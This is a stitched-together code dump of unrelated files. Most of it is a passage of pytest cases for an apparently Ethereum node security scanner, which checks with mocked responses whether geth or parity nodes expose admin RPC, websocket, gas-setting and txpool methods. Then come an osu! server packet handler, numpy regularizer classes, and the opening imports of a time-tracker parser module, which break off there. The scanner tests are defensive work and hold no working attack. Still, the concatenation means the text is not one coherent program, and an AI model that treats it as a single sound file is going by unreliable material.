                description="The HTTP RPC service can be started using the admin_startRPC RPC call.",
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="GethStartRPC geth issue logged",
    ),
    pytest.param(
        GethStartRPC(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["admin_startRPC"],
        [],
        id="GethStartRPC geth no issue",
    ),
    pytest.param(
        GethStartRPC(),
        NodeType.PARITY,
        [],
        [],
        [],
        id="GethStartRPC parity skipped no issue",
    ),
]
# GethStopRPC: geth-only. admin_stopRPC returning True is a CRITICAL issue;
# False logs nothing; parity is skipped.
TESTCASES += [
    pytest.param(
        GethStopRPC(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["admin_stopRPC"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Admin RPC Stop Rights",
                description="The HTTP RPC service can be stopped using the admin_stopRPC RPC call.",
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        # Fixed: all three ids in this section previously said "GethStartRPC"
        # (copy-paste from the block above), duplicating that block's ids and
        # mislabelling these cases in pytest output/selection.
        id="GethStopRPC geth issue logged",
    ),
    pytest.param(
        GethStopRPC(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["admin_stopRPC"],
        [],
        id="GethStopRPC geth no issue",
    ),
    pytest.param(
        GethStopRPC(),
        NodeType.PARITY,
        [],
        [],
        [],
        id="GethStopRPC parity skipped no issue",
    ),
]
# GethStartWebsocket: geth-only. admin_startWS returning True is a CRITICAL
# issue; False logs nothing; parity is skipped.
TESTCASES += [
    pytest.param(
        GethStartWebsocket(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["admin_startWS"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Admin Websocket Start Rights",
                description="The RPC Websocket service can be started using the admin_startWS RPC call.",
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="GethStartWebsocket geth issue logged",
    ),
    pytest.param(
        GethStartWebsocket(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["admin_startWS"],
        [],
        id="GethStartWebsocket geth no issue",
    ),
    pytest.param(
        GethStartWebsocket(),
        NodeType.PARITY,
        [],
        [],
        [],
        id="GethStartWebsocket parity skipped no issue",
    ),
]
# GethStopWebsocket: geth-only. admin_stopWS returning True is a CRITICAL
# issue; False logs nothing; parity is skipped.
TESTCASES += [
    pytest.param(
        GethStopWebsocket(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": True,
                },
            }
        ],
        ["admin_stopWS"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Admin Websocket Stop Rights",
                description="The RPC Websocket service can be stopped using the admin_stopWS RPC call.",
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="GethStopWebsocket geth issue logged",
    ),
    pytest.param(
        GethStopWebsocket(),
        NodeType.GETH,
        [
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": False,
                },
            }
        ],
        ["admin_stopWS"],
        [],
        id="GethStopWebsocket geth no issue",
    ),
    pytest.param(
        GethStopWebsocket(),
        NodeType.PARITY,
        [],
        [],
        [],
        id="GethStopWebsocket parity skipped no issue",
    ),
]
# SHA3Consistency
TESTCASES += [
pytest.param(
SHA3Consistency(
test_input="0x68656c6c6f20776f726c64",
test_output="0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
},
}
],
["web3_sha3"],
[],
id="SHA3Consistency geth no issue",
),
pytest.param(
SHA3Consistency(
test_input="0x68656c6c6f20776f726c64",
test_output="0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "lolnope",
},
}
],
["web3_sha3"],
[
Issue(
uuid=TEST_UUID,
title="SHA3 test failed",
description="Expected 0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad but received lolnope",
severity=Severity.CRITICAL,
raw_data="lolnope",
)
],
id="SHA3Consistency geth issue logged",
),
pytest.param(
SHA3Consistency(
test_input="0x68656c6c6f20776f726c64",
test_output="0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
},
}
],
["web3_sha3"],
[],
id="SHA3Consistency parity no issue",
),
pytest.param(
SHA3Consistency(
test_input="0x68656c6c6f20776f726c64",
test_output="0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "lolnope",
},
}
],
["web3_sha3"],
[
Issue(
uuid=TEST_UUID,
title="SHA3 test failed",
description="Expected 0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad but received lolnope",
severity=Severity.CRITICAL,
raw_data="lolnope",
)
],
id="SHA3Consistency parity issue logged",
),
]
# NodeSync
TESTCASES += [
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 1000",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync geth exact match and syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: False Block Number: 1000",
severity=Severity.NONE,
raw_data=False,
)
],
id="NodeSync geth exact match and not syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(995),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 995",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync geth in lower threshold and not syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 1",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync geth below threshold but syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="The node's block number is stale and its not synchronizing. The node is stuck!",
severity=Severity.CRITICAL,
raw_data=False,
)
],
id="NodeSync geth below threshold and not syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 1000",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync parity exact match and syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: False Block Number: 1000",
severity=Severity.NONE,
raw_data=False,
)
],
id="NodeSync parity exact match and not syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(995),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 995",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync parity in lower threshold and not syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 1",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync parity below threshold but syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="The node's block number is stale and its not synchronizing. The node is stuck!",
severity=Severity.CRITICAL,
raw_data=False,
)
],
id="NodeSync parity below threshold and not syncing",
),
]
# ParityTxCeiling
TESTCASES += [
pytest.param(
ParityTxCeiling(gas_limit=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": True},
}
],
["parity_setMaxTransactionGas"],
[
Issue(
uuid=TEST_UUID,
title="Transaction maximum gas can be changed",
description="Anyone can change the maximum transaction gas limit using the parity_setMaxTransactionGas RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="ParityTxCeiling parity issue logged",
),
pytest.param(
ParityTxCeiling(gas_limit=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["parity_setMaxTransactionGas"],
[],
id="ParityTxCeiling parity error",
),
pytest.param(
ParityTxCeiling(gas_limit=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_setMaxTransactionGas"],
[],
id="ParityTxCeiling parity error",
),
pytest.param(
ParityTxCeiling(gas_limit=1000),
NodeType.GETH,
[],
[],
[],
id="ParityTxCeiling geth skipped",
),
]
# ParityMinGasPrice
TESTCASES += [
pytest.param(
ParityMinGasPrice(gas_price=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": True},
}
],
["parity_setMinGasPrice"],
[
Issue(
uuid=TEST_UUID,
title="Transaction minimum gas can be changed",
description="Anyone can change the minimum transaction gas limit using the parity_setMinGasPrice RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="ParityMinGasPrice parity issue logged",
),
pytest.param(
ParityMinGasPrice(gas_price=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["parity_setMinGasPrice"],
[],
id="ParityMinGasPrice parity error",
),
pytest.param(
ParityMinGasPrice(gas_price=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_setMinGasPrice"],
[],
id="ParityMinGasPrice parity error",
),
pytest.param(
ParityMinGasPrice(gas_price=1000),
NodeType.GETH,
[],
[],
[],
id="ParityMinGasPrice geth skipped",
),
]
# TxPoolContent
TESTCASES += [
pytest.param(
TxPoolContent(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "txpool content stuff"},
}
],
["parity_pendingTransactions"],
[
Issue(
uuid=TEST_UUID,
title="TxPool Content",
description=(
"Anyone can see the transaction pool contents using "
"the parity_pendingTransactions RPC call."
),
severity=Severity.LOW,
raw_data="txpool content stuff",
)
],
id="TxPoolContent parity issue logged",
),
pytest.param(
TxPoolContent(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "txpool content stuff"},
}
],
["txpool_content"],
[
Issue(
uuid=TEST_UUID,
title="TxPool Content",
description="Anyone can see the transcation pool contents using the txpool_content RPC call.",
severity=Severity.LOW,
raw_data="txpool content stuff",
)
],
id="TxPoolContent geth issue logged",
),
pytest.param(
TxPoolContent(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["txpool_content"],
[],
id="TxPoolContent geth error",
),
pytest.param(
TxPoolContent(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_pendingTransactions"],
[],
id="TxPoolContent parity error",
),
pytest.param(
TxPoolContent(),
NodeType.IPFS,
[],
[],
[],
id="TxPoolContent unknown node",
),
]
# GethTxPoolInspection
TESTCASES += [
pytest.param(
GethTxPoolInspection(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "txpool stuff",
},
}
],
["txpool_inspect"],
[
Issue(
uuid=TEST_UUID,
title="TxPool Inspection",
description="Anyone can inspect the transaction pool using the txpool_inspect RPC call.",
severity=Severity.LOW,
raw_data="txpool stuff",
)
],
id="GethTxPoolInspection geth issue logged",
),
pytest.param(
GethTxPoolInspection(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["txpool_inspect"],
[],
id="GethTxPoolInspection geth no issue",
),
pytest.param(
GethTxPoolInspection(),
NodeType.PARITY,
[],
[],
[],
id="GethTxPoolInspection parity skipped no issue",
),
]
# GethTxPoolStatus
TESTCASES += [
pytest.param(
GethTxPoolStatus(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "txpool stuff",
},
}
],
["txpool_status"],
[
Issue(
uuid=TEST_UUID,
title="TxPool Status",
description="Anyone can see the transaction pool status using the txpool_status RPC call.",
severity=Severity.LOW,
raw_data="txpool stuff",
)
],
id="GethTxPoolStatus geth issue logged",
),
pytest.param(
GethTxPoolStatus(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["txpool_status"],
[],
id="GethTxPoolStatus geth no issue",
),
pytest.param(
GethTxPoolStatus(),
NodeType.PARITY,
[],
[],
[],
id="GethTxPoolStatus parity skipped no issue",
),
]
# ParityTxPoolStatistics
TESTCASES += [
pytest.param(
ParityTxPoolStatistics(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "txpool statistics",
},
}
],
["parity_pendingTransactionsStats"],
[
Issue(
uuid=TEST_UUID,
title="TxPool Statistics",
description="Anyone can see the transaction pool statistics using the parity_pendingTransactionsStats RPC call.",
severity=Severity.LOW,
raw_data="txpool statistics",
)
],
id="ParityTxPoolStatistics parity issue logged",
),
pytest.param(
ParityTxPoolStatistics(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_pendingTransactionsStats"],
[],
id="ParityTxPoolStatistics parity no issue",
),
pytest.param(
ParityTxPoolStatistics(),
NodeType.GETH,
[],
[],
[],
id="ParityTxPoolStatistics geth skipped no issue",
),
]
# ParityUpgrade
TESTCASES += [
pytest.param(
ParityUpgrade(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": {"upgrade": "stuff"},
},
}
],
["parity_upgradeReady"],
[
Issue(
uuid=TEST_UUID,
title="The node can be upgraded",
description=(
"A new node upgrade has been detected using "
"the parity_upgradeReady RPC call."
),
severity=Severity.CRITICAL,
raw_data={"upgrade": "stuff"},
)
],
id="ParityUpgrade parity issue logged",
),
pytest.param(
ParityUpgrade(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": None,
},
}
],
["parity_upgradeReady"],
[],
id="ParityUpgrade parity no issue",
),
pytest.param(
ParityUpgrade(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_upgradeReady"],
[],
id="ParityUpgrade parity no issue",
),
pytest.param(
ParityUpgrade(),
NodeType.GETH,
[],
[],
[],
id="ParityUpgrade geth skipped no issue",
),
]
# NodeVersion
TESTCASES += [
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
},
},
{"status_code": 200, "json": {"tag_name": "v3.0.1"}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
),
],
id="NodeVersion parity latest no issue",
),
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "OpenEthereum//v2.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
},
},
{"status_code": 200, "json": {"tag_name": "v3.0.1"}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="OpenEthereum//v2.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
),
Issue(
uuid=TEST_UUID,
title="Node version out of date",
description="2.0.1 != 3.0.1",
severity=Severity.HIGH,
raw_data="OpenEthereum//v2.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
),
],
id="NodeVersion parity old issue logged",
),
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
},
],
["web3_clientVersion"],
[],
id="NodeVersion parity error",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "Geth/v1.9.23/darwin/go1.4.1",
},
},
{"status_code": 200, "json": {"tag_name": "v1.9.23"}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="Geth/v1.9.23/darwin/go1.4.1",
),
],
id="NodeVersion geth latest no issue",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "Geth/v0.9.3/darwin/go1.4.1",
},
},
{"status_code": 200, "json": {"tag_name": "v1.9.23"}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="Geth/v0.9.3/darwin/go1.4.1",
),
Issue(
uuid=TEST_UUID,
title="Node version out of date",
description="0.9.3 != 1.9.23",
severity=Severity.HIGH,
raw_data="Geth/v0.9.3/darwin/go1.4.1",
),
],
id="NodeVersion geth old issue logged",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
},
],
["web3_clientVersion"],
[],
id="NodeVersion geth error",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "Geth/v0.9.3/darwin/go1.4.1",
},
},
{"status_code": 200, "text": "rate limited"},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="Geth/v0.9.3/darwin/go1.4.1",
),
],
id="NodeVersion geth github invalid JSON",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "Geth/v0.9.3/darwin/go1.4.1",
},
},
{"status_code": 200, "json": {}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="Geth/v0.9.3/darwin/go1.4.1",
),
],
id="NodeVersion geth github missing tag",
),
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
},
},
{"status_code": 200, "text": "rate limited"},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
),
],
id="NodeVersion parity github invalid JSON",
),
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
},
},
{"status_code": 200, "json": {}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
),
],
id="NodeVersion parity github missing tag",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "no valid version here",
},
},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="no valid version here",
),
],
id="NodeVersion geth no version found",
),
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "no valid version here",
},
},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="no valid version here",
),
],
id="NodeVersion parity no version found",
),
]
@pytest.mark.parametrize(
    "plugin,node_type,rpc_results,rpc_methods,issues",
    TESTCASES,
)
@patch(
    target="teatime.reporting.issue.uuid4",
    new=Mock(return_value=uuid.UUID(TEST_UUID)),
)
def test_issues(plugin, node_type, rpc_results, rpc_methods, issues):
    """Run one plugin against a mocked RPC endpoint and verify its report.

    Each TESTCASES entry supplies: the plugin instance, the node type to scan
    as, the canned HTTP responses to serve (in order), the JSON-RPC method
    names the plugin is expected to call, and the issues it should log.
    The uuid4 patch pins issue UUIDs so dict comparisons are deterministic.
    """
    context = Context(
        target=TARGET,
        report=Report(uuid=TEST_UUID, target=TARGET, issues=[]),
        node_type=node_type,
    )
    with requests_mock.Mocker() as mock:
        # Serve the canned responses regardless of URL or HTTP method.
        mock.request(
            method=requests_mock.ANY,
            url=requests_mock.ANY,
            response_list=rpc_results,
        )
        plugin.run(context=context)
        # The plugin must consume exactly the canned responses -- no extras.
        assert mock.call_count == len(rpc_results)
        for i, response in enumerate(rpc_results):
            # GitHub release-lookup requests carry no JSON-RPC body to check.
            if "api.github.com" in mock.request_history[i].url:
                continue
            assert mock.request_history[i].json()["method"] == rpc_methods[i]
        # Every plugin records that it ran in the report metadata.
        assert context.report.meta == {plugin.__class__.__name__: True}
        assert len(context.report.issues) == len(issues)
        for i1, i2 in zip(context.report.issues, issues):
            # compare dict representations here for more verbose failure diffs
            assert i1.to_dict() == i2.to_dict()
|
from handlers.decorators import OsuEvent
from objects.constants.Modificators import Mods
from packets.OsuPacketID import OsuPacketID
from packets.Reader.PacketResolver import PacketResolver
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from objects.Player import Player
# client packet: 51, bancho response: update match
@OsuEvent.register_handler(OsuPacketID.Client_MatchChangeMods)
async def update_match_mods(packet_data: bytes, token: "Player"):
    """Handle client packet 51: apply a mod change requested by *token*.

    Returns False when the player is not in a match, True after the match
    has been updated and broadcast.
    """
    if not token.match:
        return False
    active_match = token.match
    requested_mods = Mods(await PacketResolver.read_mods(packet_data))
    await active_match.change_mods(requested_mods, token)
    await active_match.update_match()
    return True
|
import numpy as np
class GenericRegularizer:
    """Do-nothing base class defining the regularizer hook interface."""

    def __init__(self):
        """Base regularizers carry no state."""

    def pre_optim_update(self, layer):
        """Hook called before the optimizer step; the base does nothing."""

    def post_optim_update(self, layer):
        """Hook called after the optimizer step; the base does nothing."""
class L1(GenericRegularizer):
    """Lasso (L1) regularization: adds sign(w) * amount to the gradient."""

    def __init__(self, regularization_amount=1e-2):
        self.regularization_amount = regularization_amount

    def __str__(self):
        return (
            "L1 (lasso)\n"
            f"regularization amount: {self.regularization_amount}"
        )

    def pre_optim_update(self, layer):
        # d/dw |w| = sign(w); scale by the regularization strength.
        layer.de_dw += self.regularization_amount * np.sign(layer.weights)
class L2(GenericRegularizer):
    """Ridge (L2) regularization: adds 2 * w * amount to the gradient."""

    def __init__(self, regularization_amount=1e-2):
        self.regularization_amount = regularization_amount

    def __str__(self):
        return (
            "L2 (Ridge)\n"
            f"regularization amount: {self.regularization_amount}"
        )

    def pre_optim_update(self, layer):
        # d/dw w^2 = 2w; scale by the regularization strength.
        layer.de_dw += (2 * self.regularization_amount) * layer.weights
class Limit(GenericRegularizer):
    """Hard weight clamp: keeps every weight inside [-limit, +limit]."""

    def __init__(self, weight_limit=1):
        self.weight_limit = weight_limit

    def __str__(self):
        return (
            "Limit\n"
            f"weight limit: {self.weight_limit}"
        )

    def post_optim_update(self, layer):
        # Clamp from above, then from below, after the optimizer step.
        capped = np.minimum(self.weight_limit, layer.weights)
        layer.weights = np.maximum(-self.weight_limit, capped)
|
#!/usr/bin/python3
#-*- coding: utf-8 -*-
# This code is PEP8-compliant. See http://www.python.org/dev/peps/pep-0008/.
"""
Wyrd In: Time tracker and task manager
CC-Share Alike 2012 © The Wyrd In team
https://github.com/WyrdIn
This module implements parsers for entities used in the program. A parser is
understood as a mapping from strings to Python objects.
"""
import re
from functools import lru_cache
from datetime import datetime, timedelta, timezone
from worktime import Interval, dayend, daystart
from grouping import SoeGrouping
